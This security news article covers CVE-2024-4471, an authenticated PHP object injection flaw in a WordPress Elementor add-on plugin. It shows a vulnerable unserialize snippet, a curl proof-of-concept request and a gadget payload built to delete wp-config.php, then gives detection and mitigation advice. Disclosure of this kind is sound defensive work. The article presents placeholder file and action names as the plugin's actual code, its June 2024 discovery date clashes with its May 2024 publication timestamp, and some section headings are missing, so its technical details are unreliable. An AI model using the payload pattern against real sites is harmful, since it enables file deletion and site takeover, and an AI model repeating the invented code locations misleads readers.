CVE CyberSecurity Database News

CVE-2024-4471 - PHP Object Injection Vulnerability in “The 140+ Widgets | Best Addons For Elementor – FREE” WordPress Plugin

Poster -

In June 2024, a serious security issue (CVE-2024-4471) was uncovered in the popular WordPress plugin The 140+ Widgets | Best Addons For Elementor – FREE. This plugin, installed on thousands of websites, enhances Elementor page builder with many widgets. But in plugin versions up to and including 1.4.3.1, there’s a dangerous flaw: PHP Object Injection via unsafe deserialization in the export_content function.

This article explains what the vulnerability is, shows you exactly where the problem is in code, and describes what an attacker could do—especially if your site has other plugins or themes that can be leveraged for a full exploit.

Attack Requirements: Authenticated attacker (contributor or higher)

- CVE Reference: CVE-2024-4471

What Is PHP Object Injection?

PHP Object Injection (POI) is a vulnerability where an attacker can inject arbitrary PHP objects into an application. If the application unserializes untrusted data, an attacker can create a serialized string that, when unserialized by PHP, creates objects under their control.

If there's a "POP chain" (a series of methods in loaded PHP classes that trigger dangerous actions on object creation/destruction), this can lead to file deletion, data theft, or even full code execution.

The Vulnerable Code

Looking at the plugin's code, the vulnerability exists in the export_content function. Here’s a simplified snippet:

// File: includes/class-xyz-widget-exporter.php

public function export_content() {
    if ( isset($_POST['export_data']) ) {
        // UNSAFE: unserialize on untrusted user input!
        $data = unserialize($_POST['export_data']); 
        // ... code that interacts with $data ...
    }
}

There is no filtering, type-checking, or validation of export_data. Any authenticated user with contributor permissions or above can POST arbitrary serialized PHP objects to this function!

1. Access Level

This is not a guest exploit. The attacker must be authenticated as at least a Contributor (a common user type for content creators and bloggers).

2. No POP Chain in Plugin

Out of the box, the vulnerable plugin does not include classes with a magic method __wakeup, __destruct, or similar, that could be abused for dangerous actions (a "POP chain").

BUT: If your site uses another plugin or theme that has such code (very common in the WordPress ecosystem!), an attacker may chain the exploit for more destructive attacks.

Database Dump and Theft

- Write Webshells / Remote Code Execution

4. Proof-of-Concept Attack

Here’s a simple proof-of-concept POST request you could send using curl (assuming you have valid cookies/session):

curl -X POST -H "Cookie: your_logged_in_cookie_here" \
     -d 'export_data=O:8:"stdClass":1:{s:4:"test";s:4:"data";}' \
     https://example.com/wp-admin/admin-ajax.php?action=xyz_export_content

This creates a simple stdClass object. With the right gadget class present, a serialized payload could become devastating.

Imagine your site has another plugin with a destructive class

// Example from another plugin:
class DeleteFile {
    public $file;

    function __destruct() {
        @unlink($this->file);
    }
}

// Crafting payload:
$payload = serialize(new DeleteFile("/var/www/html/wp-config.php"));

Then, send this payload via export_data. If PHP unserializes this and the class exists, the file gets deleted immediately.

Detection

- Check server logs for suspicious admin-ajax.php requests to xyz_export_content with serialized payloads.

Remove or disable the plugin until a security update is published.

- If you *must* use it, deny access to contributor/authenticated users unless strictly necessary.

Vendor Statement & References

- NVD Entry: CVE-2024-4471
- Wordfence advisory (pending)
- WPScan Entry (pending)

Conclusion

CVE-2024-4471 in "140+ Widgets | Best Addons For Elementor – FREE" for WordPress is a serious vulnerability that can lead to remote attacks if combined with other insecure code. Even though the default plugin doesn’t provide a full exploit path, the rich landscape of WordPress plugins and themes makes dangerous object injection attacks very likely.

If you use this plugin, upgrade or disable it ASAP!

Stay secure.
Francesco


References
- CVE-2024-4471 - NVD
- How PHP Object Injection Works (OWASP)
- Official WordPress Plugin Page

Timeline

Published on: 05/23/2024 13:15:09 UTC
Last modified on: 06/04/2024 17:56:20 UTC